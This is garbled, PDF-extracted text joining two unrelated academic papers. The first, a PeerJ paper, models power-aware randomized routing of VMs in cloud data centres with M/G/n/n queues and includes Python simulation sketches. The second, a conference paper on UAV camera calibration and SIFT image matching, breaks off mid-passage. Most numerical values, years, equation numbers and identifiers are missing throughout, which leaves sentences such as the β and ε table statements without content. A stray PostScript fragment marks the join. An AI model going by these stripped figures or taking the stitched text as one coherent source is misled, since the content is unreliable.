randomized router. full-size doi: . /peerj-cs. /fig- khani and khanmirza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ very large data centers, due to the complexity of the problem and the need for the simultaneous migrations of a large number of vms. these decentralized approaches have some side effect on routing procedure in the first part. the router does not have complete knowledge of the current placement of cloud data center. it is noteworthy that the router neither does not know about the size, the exact arriving time and sojourn time of the future vms. these facts justify the stochastic modeling and analyzing of the router performance. in this paper, we focus on the first problem: the problem of routing arriving vm to the host. we calculate probability of slav as well as total power consumption in a cloud data center using tools of queueing theory. a cloud data center differs from traditional queueing systems. first, a cloud data can have a large number of pms; traditional queueing analysis rarely consider system of this size. second, vm sojourn time must be modeled by general distribution instead of convenient exponential distribution. these differences pose significant challenges to the analysis. we use a novel approach to respond to these challenges. our contributions in this paper are: . 
we model the cloud data centers as a group of m/g/n/n queuing systems with single task arrivals and a task buffer of finite capacity; . we define a novel optimization problem to minimize the power consumption under an explicit qos goal for any vm consolidation system; . we find the optimal routing policy using numerical methods. analytical results are validated through discrete event simulation. then, we compare our result with some benchmark algorithm for google workload. the remainder of the paper is organized as follows. the “related work” section gives an overview of existing work on cloud performance evaluation and performance characterization of m/g/n/n + r queuing systems. it also introduces some heuristic algorithms for vm consolidation that we use for comparison. in the “system model” section we discuss our analytical model in detail. we solve our optimization problem in order to obtain desired performance metrics in the “optimization problem” section. in the “simulation results” section, we present and discuss analytical as well as simulation results. we conclude the paper with the section “conclusion” discussing the results and future research directions. related work prior approaches to vm placement in the literature can be broadly divided into two categories: rigorous analytical approach and heuristic algorithms. one of the first works on analysis of performance issues in vm placement has been performed by yang et al. ( ). they obtained the distribution of response time for a cloud data center modeled as an m/m/n/n + r queueing system. they assumed both interarrival and service times are exponentially distributed, and the system has finite buffer of size n + r. the response time was broken down into waiting, service and execution periods, assuming that all three periods are independent, which is unrealistic. khani and khanmirza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ by relaxing the assumption that the service times are not exponential, one can construct an accurate and close-to-reality model at the expense of greater complexity in the analysis. most theoretical analyses have relied on extensive research in performance evaluation of m/g/n queuing systems (ma & mark, ; miyazawa, ; yao, ). however, the probability distributions of response time and queue length in m/g/n and m/g/n/n + r cannot be obtained in closed form, which necessitates the search for a suitable approximation. an approximate solution for steady-state queue length distribution in an m/g/n system with finite waiting space is described in kimura ( ). the proposed approach is exact for m/g/n/n + r when r = . a similar approach for m/g/m queues is proposed in kimura ( ). in this work, analysis is extended to compute the blocking probability and, thus, determines the smallest buffer capacity such that the rate of lost tasks remains below a predefined level. in nozaki & ross ( ), another approximation for the average queuing delay in an m/g/n/n + r queue was proposed. the approximation is based on the relationship of joint distribution of remaining service time to the equilibrium service distribution. another approximation for the blocking probability is based on the exact solution for finite capacity m/m/n/n + r queues (smith, ). again, the estimate of the blocking probability is used to guide the allocation of buffers so that the blocking probability remains below a specific threshold. most of above findings rely on some approximations. 
approximations are reasonably accurate only when the number of servers is comparatively small, typically below or so. in addition, approximation errors are high when the traffic intensity is small as stated in boxma, cohen & huffels ( ), kimura ( ), and tijms, van hoorn & federgruen ( ). as a result, we cannot apply the above results directly for performance analysis of cp data center when one or more of the following holds: the number of servers is very large or the distribution of service times is unknown and does not follow any of the “well-behaved” probability distributions such as exponential distribution. as we use the m/g/n/n queueing system to model a physical machine (pm) and not the whole data center, our analysis is suitable for performance analysis of cloud scale data centers. in addition, we study m/g/n/n in steady station setting. kimura ( ) has proposed an exact closed form for queue length distribution in an m/g/n/n. in this paper, we use this closed form in defining optimization problem (kimura, ) which let us apply numerical computation for analyzing the performance of the whole data center in next step. in order to compare the performance of randomized router in practice, we have chosen two algorithms from heuristic algorithms as benchmark: power aware best fit decreasing (pabfd) (beloglazov & buyya, ) and modified throttled (mt) (domanal & reddy, ). as mentioned before, the vm placement can be seen as a bin packing problem with variable bin sizes and prices, where bins represent the pms; items are the vms that have to be allocated; bin sizes are the available cpu capacities of the pms; and prices correspond to the power consumption by the nodes. as the bin packing problem is np-hard, to solve it beloglazov & buyya ( ) apply a modification of the best fit decreasing algorithm khani and khanmirza ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ that is shown to use no more than opt þ bins (where opt is the number of bins provided by the optimal solution) (yue, ). in pabfd, they sort all the vms in the decreasing order of their current cpu utilizations and allocate each vm to a host that provides the least increase of the power consumption caused by the allocation. in each round of pabfd all vms are placed again. the number of vm migrations skyrockets in pabfd and it is not practical in a real large-scale data center. modified throttled algorithm maintains an index table of pms and also the state of pms (domanal & reddy, ). there has been an attempt made to improve the response time and achieve efficient usage of available pms. proposed algorithm employs a method for selecting a machine for hosting arriving vm of user where, machine at first index is initially selected depending upon the state of the machine. if the machine is available, it is assigned with the request and id of machine is returned to data center resource manager, else - is returned. when the next request arrives, the machine at the index next to already assigned machine is chosen depending on the state of machine and follows the above step. this method needs to keep an updated index table of state of machines. in large data centers this task is not trivial, in particular when you taking into account the decentralized consolidation of vms. it is important that both mt and pabfd is not practical in real scenario, and here we use them just as idealistic benchmark algorithms. system model consider a iaas data center consisting of a set of |p| pms. 
let p = { , ,...,|p|} denote the index set of the set of pms. users request vms from the provider. a new request is either admitted or rejected in the admission control phase. an admitted request moves to the placement phase, where it will be assigned to one of the pms (carvalho, menasce & brasileiro, ). we suggest a randomized router after the admission. the router sends an incoming vm to pm i with probability $r_i$, for all i ∈ p. the vector $\vec{r} = \{r_1, r_2, \ldots, r_{|p|}\}$ is a probability vector and satisfies $\sum_{i \in p} r_i = 1$. vms have independent and identically distributed service (sojourn) times with mean $1/\mu$. in addition, these sojourn times are independent of the host load. assume that the utilization demand of all vms is equal to one. extensive analysis of huge data centers shows that the majority of the vms have approximately the same utilization (reiss, wilkes & hellerstein, ). this observation supports our assumption. assume that each pm only hosts at most n vms. in the case a vm is assigned to an already full pm, the pm is overloaded. an overloaded pm degrades the qos of the end user, and we can regard this event as an slav (domanal & reddy, ; beloglazov & buyya, ). it should be remembered that the router sits after admission control, so admitted vms cannot be queued. all vms arrive at the data center according to a poisson process with rate $\lambda$, so vms arrive at pm i according to a poisson process with rate $\lambda_i = \lambda r_i$, for all i ∈ p (wang, chang & liu, ). these processes are independent (see section . in trivedi ( )). the whole data center can be modeled as a group of independent m/g/n/n (also known as generalized erlang loss) systems that work in parallel.

generalized erlang loss system

it is well known that for an m/g/n/n system, the steady-state distribution exists and is given by the "product form" below (kelly, ; kimura, ):

$$p_k = \begin{cases} p_0 \dfrac{(\lambda/\mu)^k}{k!}, & \text{for } k \le n \\ 0, & \text{for } k > n \end{cases}$$ ( )

where $p_k$ denotes the steady-state probability that there are k vms in the m/g/n/n system, that is $p_k = \lim_{t \to \infty} p_k(t)$, and the steady-state probability that the m/g/n/n system is empty ($p_0$) is given by

$$p_0 = \left[ \sum_{k=0}^{n} \frac{(\lambda/\mu)^k}{k!} \right]^{-1}$$ ( )

specifically, $p_n$ describes the fraction of time that the pm is fully utilized. we call this probability slav, and it is given by

$$p_n = \frac{(\lambda/\mu)^n / n!}{\sum_{k=0}^{n} (\lambda/\mu)^k / k!}$$ ( )

power consumption

we are interested in minimizing the total power consumption of the data center. according to the results of the standard experiments stated in (spec.org, ) (fig. ), the instantaneous power consumption of pm i is a function of the utilization level k of that pm:

$$w_i = \begin{cases} a + b\,k, & \text{for } k > 0 \\ 0, & \text{for } k = 0 \end{cases}$$ ( )

figure . linear power consumption (power in watt versus utilization level, from active idle to full load).

where $0 \le k \le n$ is an integer variable and both a and b are fixed values. in our model, k can be seen as the number of vms in pm i. then the expected steady-state power consumption will be

$$E[w_i] = \sum_{k} w_{i,k}\, p_{i,k}$$ ( )
$$\phantom{E[w_i]} = a\,(1 - p_{i,0}) + b \sum_{k} k\, p_{i,k}$$ ( )

where $p_{i,k}$ denotes the steady-state probability that the utilization of pm i is k and can be calculated by eq. ( ) for n = . note that $E[w_i] = 0$ if and only if $\lambda_i = 0$ ($p_{i,0} = 1$). our objective is to determine the vector $\vec{r}$ that minimizes the total expected steady-state power consumption of the data center, that is,

$$\min_{\vec{r}} \sum_{i \in p} E[w_i]$$ ( )

sla constraint

we are interested in keeping the probability of slav below a given value ε. slav happens when pm i does not have sufficient capacity for a newly arriving vm (when the m/g/n/n system is in state n). the slav constraint is

$$\Pr(\text{slav}) = p_{i,n} \le \varepsilon, \qquad \forall i \in p$$ ( )

where $p_{i,n}$ denotes the steady-state blocking probability of pm i.

optimization problem

in this section, we consider the optimization problem in which the router decides where each incoming vm will be sent, so as to minimize the total expected power consumption subject to the sla constraints. the optimization problem can be formulated as follows:

$$\min_{\vec{r}} \sum_{i \in p} E[w_i]$$ ( )
$$\text{s.t.} \quad \sum_{i \in p} r_i = 1$$ ( )
$$p_{i,n} \le \varepsilon, \qquad \forall i \in p$$ ( )
$$\lambda_i = \lambda r_i, \qquad \forall i \in p$$ ( )

let us rewrite the optimization problem by changing the optimization variable from $\vec{r} = (r_1, \ldots, r_{|p|})$ to $\vec{x} = (x_1, \ldots, x_{|p|})$, defined as

$$x_i = \frac{\lambda_i}{\mu} = \frac{\lambda r_i}{\mu}$$ ( )

using eq. ( ) and putting eq. ( ) for k = n in eq. ( ), we get

$$\frac{x_i^{\,n}/n!}{\sum_{k=0}^{n} x_i^{\,k}/k!} \le \varepsilon, \qquad \forall i \in p$$ ( )

if we can solve this inequality constraint for $x_i$, then we have a simple inequality constraint of the form $x_i < f(\varepsilon)$. fortunately, numerical methods can be used to solve it. we show the numerical results for β for some practical values of ε in table . for example, in the first row we have β = for ε = . ; it means that if we send vms to pm i at a rate below this β ($x_i < \beta$), then the probability of slav for that pm is guaranteed to stay below the corresponding ε. the equivalent optimization problem will be

$$\min_{\vec{x}} \; f_o(\vec{x}) = \sum_{i \in p} g(x_i)$$ ( )
$$\text{s.t.} \quad \sum_{i \in p} x_i = \frac{\lambda}{\mu}$$ ( )
$$x_i \le \beta, \qquad \forall i \in p$$ ( )

in which

$$g(x) = a + \left[\sum_{k=0}^{n} \frac{x^k}{k!}\right]^{-1}\left(-a + b \sum_{k=1}^{n} k\,\frac{x^k}{k!}\right)$$ ( )

g(x) can be obtained using eqs. ( ), ( ) and ( ) with ease. we set a = and b = . for a pm equipped with an intel xeon e processor (spec.org, ). then, we can show with numerical methods that the first-order derivative of g(x) is positive ($g'(x) > 0$) and the second-order derivative of g(x) is negative ($g''(x) < 0$) for ( ≤ x ≤ ).

theorem . for any x and y ($0 < y \le x \le \beta$), there exists δ ($0 < \delta \le y$ and $0 < \delta \le \beta - x$) so that

$$g(x + \delta) + g(y - \delta) \le g(x) + g(y)$$ ( )

proof: $g''(x) < 0$ means that the derivative $g'(x)$ is nonincreasing. the condition $y \le x$ implies that $g'(x) \le g'(y)$. using the definition of the derivative and $0 < g'(x)$, we obtain

$$0 < \frac{g(x + \delta) - g(x)}{\delta} \le \frac{g(y) - g(y - \delta)}{\delta}$$ ( )

multiplying the above inequality by δ and adding $g(y - \delta) + g(x)$ yields eq. ( ).

let x denote the set of elements of $\vec{x}$. we define $\phi(\vec{x}) = \{x \in \mathrm{x} \mid 0 < x < \beta\}$.

table : numerical results for the maximum incoming rate ($x_i < \beta$) for given acceptable slav probabilities (ε); columns: slav probability (ε), maximum rate (β).
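the two numerical steps used above — solving the blocking-probability inequality for β and checking that $g'(x) > 0$ and $g''(x) < 0$ — are easy to reproduce directly from the product form. the python sketch below does both; the per-pm capacity and the power coefficients a and b are hypothetical placeholders, not the elided values used in the paper.

import math

N = 10              # assumed per-pm capacity (vms), hypothetical
A, B = 100.0, 20.0  # assumed power-model coefficients (watt), hypothetical

def steady_state(x, n=N):
    # p_0 ... p_n of one m/g/n/n pm at offered load x = lambda_i / mu (product form above)
    w = [x ** k / math.factorial(k) for k in range(n + 1)]
    s = sum(w)
    return [v / s for v in w]

def blocking_prob(x, n=N):
    return steady_state(x, n)[-1]           # p_n, the slav probability

def beta_for(eps, hi=1e6, tol=1e-9):
    # largest x with blocking_prob(x) <= eps; bisection works because p_n is increasing in x
    lo = 0.0
    while hi - lo > tol * max(1.0, hi):
        mid = 0.5 * (lo + hi)
        lo, hi = (mid, hi) if blocking_prob(mid) <= eps else (lo, mid)
    return lo

def g(x):
    # expected steady-state power of one pm: a(1 - p_0) + b * e[k]
    p = steady_state(x)
    return A * (1.0 - p[0]) + B * sum(k * pk for k, pk in enumerate(p))

for eps in (1e-2, 1e-3, 1e-4):
    print(f"epsilon = {eps:g} -> beta ~ {beta_for(eps):.4f}")

h = 1e-4
for x in (0.5, 1.0, 2.0, 5.0, 8.0):         # finite-difference check of g' > 0 and g'' < 0
    d1 = (g(x + h) - g(x - h)) / (2 * h)
    d2 = (g(x + h) - 2 * g(x) + g(x - h)) / h ** 2
    print(f"x = {x:4.1f}  g' = {d1:8.4f}  g'' = {d2:9.5f}")

because the blocking probability is monotone in the offered load, the bisection converges to the largest admissible per-pm load for the chosen ε, which is the role table plays in the derivation above.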
theorem . the size of the subset $\phi$ for the minimal vector is at most one.

proof: consider a vector $\vec{x}$ which satisfies eqs. ( )–( ) and has $|\phi(\vec{x})| > 1$. in our proof, we define a method to transform $\vec{x}$ into $\vec{x}'$, and then we show two properties of the transformation: first, the value of $f_o$ for the transformed vector is not greater than for the original vector, $f_o(\vec{x}') \le f_o(\vec{x})$ ( ); second, the transformation converges, in the sense that repeated application reaches a vector $\vec{x}^*$ with $|\phi(\vec{x}^*)| \le 1$, to which the transformation can no longer be applied.

first, the definition of the transformation. because $|\phi(\vec{x})| > 1$, we can find $x_i$ and $x_j$ in $\phi(\vec{x})$ with $0 < x_i < \beta$ and $0 < x_j < \beta$. without loss of generality, assume $0 < x_j \le x_i < \beta$. we have two cases for $x_i + x_j$: ( ) $x_i + x_j \ge \beta$, and ( ) $x_i + x_j < \beta$. in the first case, we define $\delta = \beta - x_i$ and then change only the values $x_i$ and $x_j$ in $\vec{x}$ to get $\vec{x}'$ as follows:

$$x'_i = x_i + \delta = \beta$$ ( )
$$x'_j = x_j - \delta$$ ( )

in the second case, we define $\delta = x_j$ and then change only the values $x_i$ and $x_j$ in $\vec{x}$ as follows:

$$x'_i = x_i + x_j$$ ( )
$$x'_j = 0$$ ( )

note that $x'_i + x'_j = x_i + x_j$, so the constraint eq. ( ) is still satisfied by $\vec{x}'$. having defined the transformation, we prove the first property. using theorem with the δ defined above, we can conclude

$$g(x_i + \delta) + g(x_j - \delta) = g(x'_i) + g(x'_j) \le g(x_i) + g(x_j)$$ ( )

adding the unchanged elements of $\vec{x}$ to both sides of the above inequality yields eq. ( ). for the proof of the second property, consider eqs. ( ) and ( ). these imply that at least one of $x'_i$ or $x'_j$ will not be in the subset $\phi(\vec{x}')$, so the size of the subset $\phi$ is decreased by the transformation as follows:

$$|\phi(\vec{x})| - |\phi(\vec{x}')| = \begin{cases} 2, & \text{for } x'_i = \beta \text{ and } x'_j = 0 \\ 1, & \text{otherwise} \end{cases}$$ ( )

because $|\phi(\vec{x})|$ is finite, it will eventually reach 1 or 0 and no further transformation is possible. at this point, due to the first property eq. ( ), we reach a minimal vector. without loss of generality, we assume that the elements of the minimal vector are ordered $x^*_1 \ge x^*_2 \ge \dots \ge x^*_{|p|}$. the minimal solution of eqs. ( ) and ( ) will be

$$x^*_i = \begin{cases} \beta, & \text{for } 1 \le i \le n^* \\ \dfrac{\lambda}{\mu} - \beta n^*, & \text{for } i = n^* + 1 \\ 0, & \text{for others} \end{cases}$$ ( )

where $n^* = \lfloor \lambda/(\beta\mu) \rfloor$ is the number of pms which must be filled completely (up to β). the remaining load (if it exists) must be dispatched to the next pm. for large-scale data centers, we can neglect this pm and express the solution of eqs. ( )–( ) as follows:

$$r^*_i = \begin{cases} \dfrac{1}{n^*}, & \text{for } 1 \le i \le n^* \\ 0, & \text{for others} \end{cases}$$ ( )

for implementation, we only need a random generator. when a new vm arrives, we draw i from [1, n*] and send this vm to pm i. we do not require any polling; therefore our implementation is simple and agile, as required in a cloud data center.

simulation results

to validate the analytical solution, we have built a discrete event simulator of a cp data center using matlab ( ). we have considered the system with two different sojourn time distributions: exponential and uniform. in both cases the mean sojourn time is fixed at μ = . the mean inter-arrival time of vms was varied (λ = to ) to give reasonable insight into the behavior and dimensioning of cp data centers. regarding λ and μ, the traffic intensity varies from to , which represents the mean number of vms in the data center at steady state according to little's formula. the number of active pms $n^*$ (determined by λ, μ and β as above) depends indirectly on ε; e.g., for ε = (β = ) it varies from to servers. the values chosen may be quite applicable to small- to large-sized cp data centers that try to keep the utilization of their servers as high as possible while guaranteeing a minimum qos for the users. it is noteworthy that no cp has published information regarding average traffic intensity, number of servers, or the percentage of reserved capacity. we generate confidence intervals ( %) for the steady-state measurements using the independent replications with deletions method: first, we run independent replications of each simulation, then we remove the samples of the transient phase, and finally we calculate the sample mean.
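to make the implementation note and the simulation setup above concrete, a minimal sketch of the random-generator router in front of a group of loss systems, evaluated by independent replications with a deleted warm-up, could look as follows. every parameter value (arrival rate, mean sojourn time, per-pm capacity, number of active pms, run length, replication count) is a hypothetical placeholder rather than one of the elided values used in the paper, and the uniform sojourn distribution is only one example of a general distribution.

import random, heapq

LAM, MU, N, N_STAR = 50.0, 1.0, 10, 8     # hypothetical arrival rate, service rate, capacity, active pms
SIM_TIME, WARMUP = 10_000.0, 1_000.0      # hypothetical run length and deleted transient

def sojourn():
    # general sojourn time; uniform on [0, 2/MU] has mean 1/MU, as one example
    return random.uniform(0.0, 2.0 / MU)

def one_replication(seed):
    random.seed(seed)
    in_service = [0] * N_STAR             # vms currently hosted on each active pm
    departures = []                       # (departure time, pm) min-heap
    t, arrivals, blocked = 0.0, 0, 0
    while t < SIM_TIME:
        t += random.expovariate(LAM)      # poisson arrivals to the data center
        while departures and departures[0][0] <= t:
            _, pm = heapq.heappop(departures)
            in_service[pm] -= 1
        i = random.randrange(N_STAR)      # router: draw a pm uniformly from the n* active pms
        if t > WARMUP:
            arrivals += 1
        if in_service[i] == N:            # pm already full -> slav (the vm is lost, not queued)
            if t > WARMUP:
                blocked += 1
        else:
            in_service[i] += 1
            heapq.heappush(departures, (t + sojourn(), i))
    return blocked / arrivals

# independent replications; the deleted warm-up plays the role of the removed transient samples
estimates = [one_replication(s) for s in range(5)]
print("mean slav probability:", sum(estimates) / len(estimates))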
figure depicts the slav probability in the data center at steady state. the simulation results follow the analytical model closely for all λ, m and β values, which supports the validity of the analytical model. as can be seen, the probability for the exponential sojourn time is generally lower than that for the uniform one. note that the mean sojourn time is the same for both distributions, so the difference most likely relates to the variance: the variance of the exponential distribution is about , whereas the variance of the uniform one is about . as the number of active servers increases, the slav probability decreases steadily. this trend is due to the fact that, with more active servers, an arriving vm has more places to be hosted, so the chance of blocking (and hence of slav) is lower. figure shows the effect of the sojourn time distribution on the convergence time. the data center with exponential sojourn time reaches steady state sooner than a data center with uniform sojourn time. we only show the results for β = , l = , m = , because the discussion aims to highlight the influence of the distribution on the convergence time; for larger systems and lower probabilities the discussion is the same.
figure : slav probability in the data center at steady state for various β: (a) β = , (b) β = , (c) β = , (d) β = , (e) β = .
figure : effect of the sojourn time distribution on the convergence time.
in order to study the power consumption of our method in practice, we use the google trace (reiss, wilkes & hellerstein, ), which consists of several concurrent vms in a single ∼ k server farm where the resource demand of vms is highly dynamic and requires quick decisions. figure compares the power consumption of our method with two benchmark algorithms from the literature: pabfd (beloglazov & buyya, ) and mt (domanal & reddy, ). the power consumption of our method is only about % higher than that of pabfd and mt. this higher power consumption is acceptable because the workload is highly dynamic, varies over time, and is driven by many short jobs that demand quick scheduling decisions and updates. pabfd and mt suffer from a long decision process and overwhelming migrations; these shortcomings make both of them impractical in real-world cloud computing scenarios. the comparison gives us an idea of how far we are from the idealistic benchmark algorithms in the literature.
conclusion
effective resource management is a major challenge for the leading cps (e.g., google, microsoft, amazon). performance evaluation of data centers is an important aspect of resource management and is of crucial interest for both cps and cloud users.
in this paper, we proposed an analytical model based on the m/g/n/n system for the performance evaluation of a cloud computing data center. due to the nature of cloud computing, we assumed a general sojourn time for vms as well as a large number of pms. these assumptions make our model acceptable in terms of scale and diversity. through extensive numerical simulations, we showed that our analytical model closely aligns with the simulation results. our results also indicate that our method consumes slightly more power than the idealistic benchmarks in the literature. in the future, we plan to extend our model to variable-size vms. studying how the "power of two choices" can improve the results of the randomized dispatcher will be another dimension of extension.
figure : power consumption of a data center managed by the random dispatcher and by the benchmark algorithms.
additional information and declarations
funding
the authors received no funding for this work.
competing interests
the authors declare that they have no competing interests.
author contributions
- hadi khani conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, and performed the computation work.
- hamed khanmirza analyzed the data, contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft, and contributed to the writing and latex preparation.
data availability
the following information was supplied regarding data availability: the source code is available in the supplemental file.
supplemental information
supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.
references
beloglazov a, buyya r. optimal online deterministic algorithms and adaptive heuristics for energy and performance efficient dynamic consolidation of virtual machines in cloud data centers. concurrency and computation: practice and experience.
boxma oj, cohen j, huffels n. approximations of the mean waiting time in an m/g/s queueing system. operations research.
carvalho m, menasce d, brasileiro f. prediction-based admission control for iaas clouds with multiple service classes. in: ieee international conference on cloud computing technology and science (cloudcom). piscataway: ieee.
domanal sg, reddy grm. load balancing in cloud computing using modified throttled algorithm. in: ieee international conference on cloud computing in emerging markets (ccem). piscataway: ieee.
kelly fp. loss networks. annals of applied probability.
kimura t. diffusion approximation for an m/g/m queue. operations research.
kimura t. a transform-free approximation for the finite capacity m/g/s queue. operations research.
ma bn, mark jw. approximation of the mean queue length of an m/g/c queueing system. operations research.
matlab. version (r a). natick: the mathworks inc.
miyazawa m. approximation of the queue-length distribution of an m/gi/s queue by the basic equations. journal of applied probability.
nozaki sa, ross sm. approximations in finite-capacity multi-server queues by poisson arrivals. journal of applied probability.
reiss c, wilkes j, hellerstein jl. google cluster-usage traces: format + schema. technical report. mountain view: google inc.
shojafar m, cordeschi n, baccarelli e. energy-efficient adaptive resource management for real-time vehicular cloud services. ieee transactions on cloud computing.
smith jm. m/g/c/k blocking probability models and system performance. performance evaluation.
spec.org. all specpower_ssj benchmark results. available at http://www.spec.org/ (accessed november ).
tijms hc, van hoorn mh, federgruen a. approximations for the steady-state probabilities in the m/g/c queue. advances in applied probability.
trivedi ks. probability and statistics with reliability, queueing, and computer science applications. second edition. new york: john wiley & sons, inc.
wang b, chang x, liu j. modeling heterogeneous virtual machines on iaas data centers. ieee communications letters.
wang l, gelenbe e. adaptive dispatching of tasks in the cloud. ieee transactions on cloud computing.
wang w, jiang y, wu w. multiagent-based resource allocation for energy minimization in cloud computing systems. ieee transactions on systems, man, and cybernetics: systems.
yang b, tan f, dai ys, guo s. performance evaluation of cloud service considering fault recovery. in: jaatun mg, zhao g, rong c, eds. cloud computing. cloudcom. lecture notes in computer science. berlin, heidelberg: springer.
yao dd. refining the diffusion approximation for the m/g/m queue. operations research.
yue m. a simple proof of the inequality ffd(l) ≤ 11/9 opt(l) + 1, ∀l for the ffd bin-packing algorithm. acta mathematicae applicatae sinica.
] >> setpagedevice international conference on sensor network and computer engineering (icsnce ) research on the key technology of survey measurement image based on uav ding li health services administration xi`an medical university xi’an, , shaanxi, china e-mail: @qq.com chong jiao school of computer science and engineering xi’an technological university xi’an, , shaanxi, china e-mail: @qq.com abstract—with the development of computer technology, especially the emergence of high resolution image sensor, aerial photogrammetry has played an important role in geological survey. traditional aerial measurements are carried out by manned large aircraft, with a large volume of measured information and a wide range of shots. this method is suitable for large area operation, which is high and expensive for hardware site. uav air measurement systems are usually used for small area measurements. the uav is small and fluctuates greatly during flight, the collection of the data and images are not accurate enough. this paper has obtained the accurate measurement of image by studying the image fast matching theory, which has practical significance in the actual mapping and has higher research value. keywords-uav; measurement image; image validation; image preprocessing; image matching; feature extraction i. introduction quadrotor or quadrotor uav, simply called uav, is a type of uav that has four propellers and crosses the propeller. it can record aerial video with a miniature camera. at present, uav surveying mainly relies on image aerial camera to capture images. traditional measuring cameras are not only expensive, but also require film image scanning to acquire digital images with low shooting quality and long measuring time. in this paper, a non-metric camera ccd is used for image acquisition, the advantages of ccd camera are low prices, sensor stability, and high sensitivity. non-metric cameras cannot directly measure because of the large distortion correction error, so it must be calibrated before carrying out aerial photography. ii. uav image preprocessing the uav photography system is equipped with a non-metric digital camera, which has unstable performance, uncertain orientation elements and results in optical distortion error in aerial photography. optical distortion errors include radial distortion and decentering distortion. the focal length of the camera is fixed in this system, so the difference in distortion is the systematic error, which produces the same image for all images collected. the methods of camera calibration include optical laboratory calibration, laboratory calibration and office calibration. the experimental field is consisted of mark points in some known space coordinates. during the calibration process, the experimental field is photographed with the calibrated camera, and inner element and other elements that affect the shape of the beam are solved according to the intersection of the single-chip space or the multiple-chip space [ ]. this system used uav digital camera calibration software easy calibrate to calibrate digital camera sonyrx in the d experimental calibration field. the test results and contents are showed in table ., and origin of coordinate is in the lower left corner of the image. international conference on sensor network and computer engineering (icsnce ) table i. the calibration results of sony rx camera contents of calibration value of calibration comment x - . mm camera interior azimuth element y - . mm focus f . coefficient of radial distortion k . 
e- radial distortion error coefficient coefficient of radial distortion k - . e- coefficient of eccentric aberration p . e- tangential distortion error coefficient coefficient of eccentric aberration p - . e- correction of image distortion -- indirect method, the coordinates of the corresponding point on the original image is calculated from the coordinates on the corrected image, and the image correction is implemented with the grayscale interpolation method [ ]. as shown in figure . p’y’ x’ p x y p gray value assignment grayscale resampling calculate the image point coordinates postcorrected image distortion image figure . image distortion correction schematic diagram after years of research, the corrected value of the corrected image can be calculated by the deformation error correction model, and the deformation error correction model: ( ) ( ) x, y: coordinate of the image point which origin is the center of the image, x , y : coordinates of the main point of the image ( ) international conference on sensor network and computer engineering (icsnce ) : the error coefficient of radial distortion the error coefficient of eccentric aberration : the non-square scaling factor of pixels the arranged non-orthogonal error coefficients in the ccd array the coordinate of the camera in the camera is calculated with space resection method, and the accuracy of the high-outer azimuth elements is improved, and the precision of geometric calibration is improved. the attitude control of uav is mainly through the signal of the attitude sensor. the attitude sensor includes the tilt sensor and the angular velocity sensor. the titlt sensor is implemented indirectly through the triaxial acceleration sensor [ ]. the output signals represent the current three axial acceleration values. if the uav remain static in space, then the acceleration values are simply converted to get the real dip parameters. however, it is impossible for an uav to keep stationary in the air. under the influence of the wind, the uav may deviate in one direction. at this point, even if the uav does maintain its level, the output of the acceleration sensor still deviate from the center value, resulting in misjudgment of the control core. in order to avoid this situation, it is necessary to introduce triaxial angular velocity sensors and ultrasonic range finder, the acceleration in the x and y direction is corrected to obtain true tilt information with the three axial angular velocities and the acceleration in the z-axis direction and the rate of change of the real-time height [ ]. iii. unmanned aerial vehicle image matching the image matching technique generally adopts image matching technology. the corresponding matching algorithm is used to identify the same name point between two images or multiple images. commonly used matching methods can be divided into two major categories, one is based on the matching of grayscale and the other is based on feature matching [ ]. in this paper, the sift feature matching algorithm is used for high-precision matching of massive data. the sift matching algorithm is based on the matching of local features of the image. the algorithm holds invariance to translation, rotation occlusion, and so on, so it has strong stability in practice. the feature matching process is shown in figure . 
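before moving on to matching, the indirect distortion-correction scheme sketched in figure above can be illustrated in code: for every pixel of the corrected image, the corresponding position in the distorted original is computed and the grey value is resampled bilinearly. the exact deformation model in the paper is not fully legible here, so this is a minimal numpy sketch assuming the widely used brown-conrady radial (k1, k2) plus decentering (p1, p2) model; all parameter names are ours, not the authors'.

```python
import numpy as np

def undistort_indirect(img, fx, fy, cx, cy, k1, k2, p1, p2):
    """indirect correction: map each corrected-image pixel back into the
    distorted image and resample the grey value bilinearly (a sketch)."""
    h, w = img.shape
    v, u = np.mgrid[0:h, 0:w].astype(np.float64)
    # normalized, ideal (undistorted) image coordinates
    x = (u - cx) / fx
    y = (v - cy) / fy
    r2 = x * x + y * y
    radial = 1.0 + k1 * r2 + k2 * r2 * r2
    # radial + decentering (tangential) distortion applied to the ideal coordinates
    xd = x * radial + 2.0 * p1 * x * y + p2 * (r2 + 2.0 * x * x)
    yd = y * radial + p1 * (r2 + 2.0 * y * y) + 2.0 * p2 * x * y
    # back to pixel coordinates of the original (distorted) image
    ud = xd * fx + cx
    vd = yd * fy + cy
    # bilinear grey-value resampling with border clamping
    u0 = np.clip(np.floor(ud).astype(int), 0, w - 2)
    v0 = np.clip(np.floor(vd).astype(int), 0, h - 2)
    du = np.clip(ud - u0, 0.0, 1.0)
    dv = np.clip(vd - v0, 0.0, 1.0)
    g = (img[v0, u0] * (1 - du) * (1 - dv) + img[v0, u0 + 1] * du * (1 - dv)
         + img[v0 + 1, u0] * (1 - du) * dv + img[v0 + 1, u0 + 1] * du * dv)
    return g.astype(img.dtype)
```

in practice the same operation is available through opencv's cv2.undistort once the camera matrix and the distortion coefficients of table i are known.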
scale space extreme value detection precise positioning determine the main direction of the key points key point descriptor match feature point sift features vector matching figure . feature matching flow chart a. pyramid image pyramid image refers to the original image are decomposed to obtain a series of sub-images of different resolutions. the images are sorted by resolution from small to large, and then forming a set of pyramidal overlapping images. find the matching point in the top level image, the matching position is used as the prediction position of the next layer, and the matching result of this layer is used as the initial matching position of the next layer to perform matching in order, and the matching result is used as control to match other feature points [ ]. this top-down and coarse-to-fine process ensures the reliability of the image search process. in the pyramid structure, images are represented in a hierarchical structure. at the top of the pyramid structure, the lowest resolution of data is stored. with the increase of the layers of the pyramid, the resolution of the data is sequentially reduced. at the bottom of the pyramid, the highest resolution data that can meet the need of users is stored. under the spatial reference, information is stored and displayed at different resolutions according to user needs, forming a pyramid structure with low-to-high resolution and small to large amount of data. the image pyramid structure is used for image coding and 